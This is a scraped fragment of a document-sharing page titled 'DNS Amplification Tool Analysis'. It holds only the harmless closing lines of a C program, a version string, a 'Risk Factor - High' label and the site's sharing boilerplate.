while(1)
{
sleep(1);
}
}
//printf("5");
return 0;
}

v.02-12-14

DNS Amplification Tool Analysis

Uploaded by

Document Information

Original Description:

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

DNS Amplification Tool Analysis

Uploaded by

Copyright:

Available Formats

1

Risk Factor - High

You might also like